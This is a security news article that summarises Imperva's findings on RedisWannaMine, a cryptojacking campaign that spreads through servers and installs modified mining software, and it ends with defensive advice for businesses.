Cyber criminals increasingly turn to "cryptojacking"


A new research report has found that cyber criminals are increasingly using advanced security avoidance techniques to enable “cryptojacking” – the process of hijacking a victim’s computer resources to mine for cryptocurrencies.

Also known as “illicit cryptocurrency mining”, the activity has become popular among the hacking community as an easy way to fund their other operations, as the prices of currencies such as Bitcoin continues to swell. Users can use computer hardware to “mine” for a chance to be awarded currency by endorsing thousands of transactions carried out by other users via blockchain.

According to researchers at security firm Imperva, new cryptojacking techniques usually involve malware that installs legitimate cryptocurrency mining software on targeted systems, though usually modified to redirect generated digital coins to wallets controlled by the criminals.

A new algorithm discovered by the researchers was degrees more complex than its forebears in terms of its capabilities and the techniques used to avoid detection, which Imperva describes as heralding a “new generation of cryptojacking attacks”.

These attacks tend to be aimed both at database servers and application servers, the researchers continued, leading them to dub the new technique RedisWannaMine because it is powered by the open source Redis in-memory data structure storage software and bears some similarity to the recent WannaCry attacks.

“In a nutshell, cryptojacking attackers have upped their game and they are getting crazier by the minute,” the researchers wrote in a blog post.

They tracked down RedisWannaMine through a remote code execution (RCE) detected by Imperva’s web application sensors.

What they discovered was what looks like an innocuous downloader, which on first appearance looked identical to older cryptojacking attacks, gaining remote access through a persistent string of attacks.

The researchers then discovered that the downloader acted in a unique fashion: a script installed a series of packages via standard Linux managers which do not require any other local files on the victim’s machine. The script then downloads and installs masscan, a publicly available TCP port scanner tool.

The script then looks for a certain listening port to be able to infect a server with the same cryptominer malware, if possible, avoiding several security measures that would otherwise render it inoperable.

Imperva’s researchers have advised businesses to protect their web applications and databases using a specialist web application firewall, and to make sure that their machines do not have a vulnerable version of server message block software.

About Lee Hazell

Lee Hazell is a cyber security consultant with a keen interest in anything tech or security related. Follow Lee on .

Recommended for you

Leave a Reply

Your email address will not be published. Required fields are marked *